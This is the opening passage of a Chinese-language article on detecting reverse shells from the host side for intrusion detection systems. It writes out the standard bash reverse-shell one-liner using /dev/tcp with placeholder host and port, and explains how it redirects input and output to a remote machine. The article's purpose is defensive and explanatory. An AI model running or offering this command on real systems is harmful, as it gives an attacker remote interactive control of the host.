基于主机的反弹shell检测思路

前言

难免有时候网站会存在命令执行、代码执行等漏洞可能被黑客反弹shell，如何第一时间发现反弹shell特征，kill掉相应进程，保护主机安全呢？
本文主要探究一下主机反弹shell有哪些特征，为HIDS检测主机反弹shell行为提供一些思路。

类型一

bash反弹

先从最常规的开始举个例子。

bash -i >& /dev/tcp/ip/port 0>&1

原理简单说一下，本地打开bash将标准输出、标准错误输出、标准输入通过socket链接重定向至远程

>&作用就是混合输出（错误、正确输出都输出到一个地方）

/dev/tcp|udp/ip/port 可以看作是一个远程设备，所有重定向到该设备的信息
都会被转发至 ip：port 对应的远程设备

另外至少需要把标准输出流，标准输入流定向至远程，也就是远程输入命令
执行结果定向至远程，形成一个回路，也就是交互式shell。

查看一下进程的文件描述符：